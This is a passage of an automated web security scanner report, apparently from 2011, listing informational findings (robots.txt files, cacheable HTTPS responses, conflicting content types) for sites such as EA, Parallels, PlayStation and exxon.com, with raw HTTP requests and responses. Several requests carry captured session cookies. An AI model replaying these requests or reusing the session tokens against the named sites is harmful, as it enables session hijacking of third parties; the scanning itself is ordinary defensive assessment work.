Disallow: /files/
Disallow: /_lang/
Disallow: /_theme/
Disallow: /theme/
Disallow: /_images/
Disallow: /images/
Disallow: /_download/
Disallow: /download/
Disallow: /j
...[SNIP]...
25.8. http://d1.openx.org/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:36 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "3b4b05-131-48f142a249100"
Accept-Ranges: bytes
Content-Length: 305
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...
25.9. http://display.digitalriver.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: display.digitalriver.com

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:54 GMT
Server: Apache/2.2.9
Last-Modified: Tue, 06 Apr 2010 14:04:58 GMT
ETag: "1c44a1-1a-48391ee477680"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /
25.10. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Fri, 24 Jun 2011 13:28:51 GMT
Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /
25.11. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1034849195/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1034849195/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Fri, 24 Jun 2011 13:18:36 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
25.12. http://l.addthiscdn.com/live/t00/250lo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 24 May 2011 11:04:31 GMT
ETag: "d099d3-1b-4a4038d666dc0"
Content-Type: text/plain; charset=UTF-8
Date: Fri, 24 Jun 2011 13:16:11 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

25.13. http://rcci.122.2o7.net/b/ss/celebritycruiseprod/1/H.22.1/s6910370561759  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcci.122.2o7.net
Path:   /b/ss/celebritycruiseprod/1/H.22.1/s6910370561759

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rcci.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:29:06 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "541bf-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www388
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
25.14. http://s7.addthis.com/js/250/addthis_widget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s7.addthis.com
Path:   /js/250/addthis_widget.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s7.addthis.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "14aa47-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Fri, 24 Jun 2011 13:22:24 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

25.15. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Fri, 24 Jun 2011 13:18:32 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
25.16. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.30.146.197
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:40 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...
25.17. http://swsoft.122.2o7.net/b/ss/swsdev/1/H.21/s08157070665620  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swsoft.122.2o7.net
Path:   /b/ss/swsdev/1/H.21/s08157070665620

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: swsoft.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:11:01 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "1ad14b-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www295
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
25.18. http://tracking.searchmarketing.com/welcome.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tracking.searchmarketing.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 39
Content-Type: text/plain
Last-Modified: Fri, 10 Dec 2010 21:52:28 GMT
Accept-Ranges: bytes
ETag: "441af89b498cb1:cf9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 14:36:07 GMT
Connection: close

# go away
User-agent: *
Disallow: /
25.19. http://wotifcom.112.2o7.net/b/ss/wotifcom-awd-global-prd,wotifcom-awd-phuket-prd/1/H.17/s69540000788401  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wotifcom.112.2o7.net
Path:   /b/ss/wotifcom-awd-global-prd,wotifcom-awd-phuket-prd/1/H.17/s69540000788401

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wotifcom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:41 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "22016d-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www625
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
25.20. http://www.addthis.com/bookmark.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.addthis.com

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:18:53 GMT
Server: Apache
Last-Modified: Wed, 22 Jun 2011 20:12:10 GMT
ETag: "fb93ab-7b-4a6529558da80"
Accept-Ranges: bytes
Content-Length: 123
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /analytics
Disallow: /test/
Disallow: /pages/toolbar
25.21. http://www.celebritycruises.com/iw-cc/base/styles/iw.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /iw-cc/base/styles/iw.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celebritycruises.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Sat, 19 Sep 2009 18:40:30 GMT
ETag: "2c98-304-953e2380"
Accept-Ranges: bytes
Content-Length: 772
Content-Type: text/plain
Cache-Control: max-age=40896
Expires: Sat, 25 Jun 2011 00:44:20 GMT
Date: Fri, 24 Jun 2011 13:22:44 GMT
Connection: close

User-agent: *
Disallow: /META-INF
Disallow: /WEB-INF
User-agent: sitecheck.internetseer.com
Disallow: /
User-agent: Zealbot
Disallow: /
User-agent: MSIECrawler
Disallow: /
User-agent: SiteSnagger
Disa
...[SNIP]...
25.22. http://www.epm.com.co/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epm.com.co
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.epm.com.co

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 132
Date: Thu, 23 Jun 2011 22:29:01 GMT
Content-Type: text/plain
ETag: "809b89a6f61bc81:5897"
Server: Microsoft-IIS/6.0
Accept-Ranges: bytes
Last-Modified: Wed, 31 Oct 2007 19:45:55 GMT
X-Powered-By: ASP.NET

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi
25.23. http://www.facebook.com/sharer/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer/sharer.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.251.33
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...
25.24. http://www.google-analytics.com/siteopt.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /siteopt.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Fri, 24 Jun 2011 13:15:55 GMT
Expires: Fri, 24 Jun 2011 13:15:55 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js
25.25. http://www.googleadservices.com/pagead/conversion/1034849195/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1034849195/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 10 Jun 2011 20:18:24 GMT
Date: Fri, 24 Jun 2011 13:18:34 GMT
Expires: Fri, 24 Jun 2011 13:18:34 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
25.26. http://www.parallels.com/en/store/plesk/win/addons/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parallels.com
Path:   /en/store/plesk/win/addons/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.parallels.com

Response

HTTP/1.0 200 OK
Date: Fri, 24 Jun 2011 20:23:16 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 11 Nov 2009 11:36:01 GMT
ETag: "1b4d800c-7e-d4c2ea40"
Accept-Ranges: bytes
Content-Length: 126
Expires: Sat, 25 Jun 2011 20:23:16 GMT
Content-Type: text/plain; charset=UTF-8
Age: 20853
X-Cache: HIT from www.parallels.com
X-Cache-Lookup: HIT from www.parallels.com:80
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /eu
Disallow: /uk
Disallow: /account/
Sitemap: http://www.parallels.com/sitemap.xml
26. Cacheable HTTPS response  previous  next
There are 5 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

26.1. https://customersupport.ea.com/loginapp/cp/login.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customersupport.ea.com
Path:   /loginapp/cp/login.do

Request

GET /loginapp/cp/login.do?skin=ea&locale=en_US&curl=http://support.ea.com/app/home&surl=http://support.ea.com/ci/pta/login&p_next_page=redirect_users%2Fnextlink%2F3 HTTP/1.1
Host: customersupport.ea.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BBB74202101D3C876CD484EC760E7696.TomcatC; CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:44:45 GMT
Server: Apache/2.0.59 (Unix) mod_jk/1.2.23
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 9523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                           <!DOCTYPE
...[SNIP]...
26.2. https://shop.marketplace.parallels.com/http/blank.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.marketplace.parallels.com
Path:   /http/blank.html

Request

GET /http/blank.html HTTP/1.1
Host: shop.marketplace.parallels.com
Connection: keep-alive
Referer: https://softlayer.parallelsmarketplace.com/store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aspcms_sid=d7aaa062b220f34045ee842b61dd35f8; __utmz=1.1306243398.5.3.utmcsr=webmail.nosedivesailing.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/portal/sidebar.php; __utma=1.1253792871.1305655713.1306182369.1306243398.5; s_vnum=1337191716908%26vn%3D5; PHPSESSID=41b3aa8f60450684cc9c47ad0f2cd160

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:25 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 22 Jul 2010 10:35:47 GMT
ETag: "111a0004-1-7b3386c0"
Accept-Ranges: bytes
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8


26.3. https://softlayer.parallelsmarketplace.com/store/design/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/design/images/favicon.ico

Request

GET /store/design/images/favicon.ico HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; PHPSESSID=6a9429b7d6c03539695bbec853449bea

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:36 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 22 Jul 2010 10:35:53 GMT
ETag: "2258102-47e-7b8f1440"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

............ .h.......(....... ..... .....@...................................$/.0$/..$/.0........$/.0$/..$/.0................................$/..$/..$/..........$/..$/..$/............................
...[SNIP]...
26.4. https://store.playstation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.playstation.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: store.playstation.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E81B82051D2A0E-60000127A0560B82[CE]; mbox=check#true#1308858991|session#1308858899721-95544#1308860791|PC#1308858899721-95544.17#1310068531; APPLICATION_SITE_URL=http%3A//us.playstation.com/support/answer/index.htm%3Fa_id%3D2360; s_pers=%20gpv_pageName%3DPS/SUPPORT/ANSWER/2360%7C1308860739047%3B%20s_nr%3D1308858939053-Repeat%7C1340394939053%3B%20s_pv%3DPS/SUPPORT/ANSWER/2360%7C1308860739059%3B; JSESSIONID=4B412C125DA39E38D5DD0971331C3A38.lvp-p1-npnavpct02-2009

Response

HTTP/1.1 200 OK
Age: 1
Date: Fri, 24 Jun 2011 13:40:37 GMT
Cache-Control: private
Connection: Keep-Alive
Via: N1.SJC1: 100
ETag: "466-4a4aa1fef1380"
Server: Apache
Last-Modified: Wed, 01 Jun 2011 17:48:14 GMT
Accept-Ranges: bytes
Cteonnt-Length: 1126
Keep-Alive: timeout=300
Content-Type: text/plain; charset=UTF-8
Content-Length: 1126

............ .P.......(............. .....(................... .........................T1...pN...^..f=.N0..............bA(...f.bB+.........6...R1..U9$.K,..n?...........................T2.4...xC"...
...[SNIP]...
26.5. https://www.ea.com/profile/register  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ea.com
Path:   /profile/register

Request

GET /profile/register?locale=en_US&surl=http%253A%252F%252Fsupport.ea.com%252Fapp%252Fhome&curl=http%253A%252F%252Fsupport.ea.com%252Fapp%252Fhome&registrationSource=EA-CustomerSupport HTTP/1.1
Host: www.ea.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:44:44 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
P3P: CP="CAO PSA OUR"
Vary: Accept-Encoding
Content-Length: 10092
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
27. Multiple content types specified  previous  next
There are 12 instances of this issue:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

27.1. http://exxon.com/Images/lightview/close_large.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exxon.com
Path:   /Images/lightview/close_large.png

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /Images/lightview/close_large.png HTTP/1.1
Host: exxon.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/payment.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSQRTDQC=ACCNCJOBLHNOKJJNEPOAPHNK; ASP.NET_SessionId=xetvx145xaysb5mchbajmpqa; style=medium

Response

HTTP/1.1 404 Not Found
Content-Length: 4503
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:28:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
27.2. http://exxon.com/Images/lightview/close_small.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exxon.com
Path:   /Images/lightview/close_small.png

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /Images/lightview/close_small.png HTTP/1.1
Host: exxon.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/payment.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSQRTDQC=ACCNCJOBLHNOKJJNEPOAPHNK; ASP.NET_SessionId=xetvx145xaysb5mchbajmpqa; style=medium

Response

HTTP/1.1 404 Not Found
Content-Length: 4503
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:28:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
27.3. http://exxon.com/Images/lightview/controller_prev.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exxon.com
Path:   /Images/lightview/controller_prev.png

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /Images/lightview/controller_prev.png HTTP/1.1
Host: exxon.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/payment.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSQRTDQC=ACCNCJOBLHNOKJJNEPOAPHNK; ASP.NET_SessionId=xetvx145xaysb5mchbajmpqa; style=medium

Response

HTTP/1.1 404 Not Found
Content-Length: 4503
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:28:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
27.4. http://exxon.com/Images/lightview/controller_slideshow_stop.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exxon.com
Path:   /Images/lightview/controller_slideshow_stop.png

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /Images/lightview/controller_slideshow_stop.png HTTP/1.1
Host: exxon.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/payment.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSQRTDQC=ACCNCJOBLHNOKJJNEPOAPHNK; ASP.NET_SessionId=xetvx145xaysb5mchbajmpqa; style=medium

Response

HTTP/1.1 404 Not Found
Content-Length: 4503
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:28:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
27.5. http://exxon.com/Images/lightview/inner_next.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://exxon.com
Path:   /Images/lightview/inner_next.png

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /Images/lightview/inner_next.png HTTP/1.1
Host: exxon.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/payment.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSQRTDQC=ACCNCJOBLHNOKJJNEPOAPHNK; ASP.NET_SessionId=xetvx145xaysb5mchbajmpqa; style=medium

Response

HTTP/1.1 404 Not Found
Content-Length: 4503
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:28:47 GMT

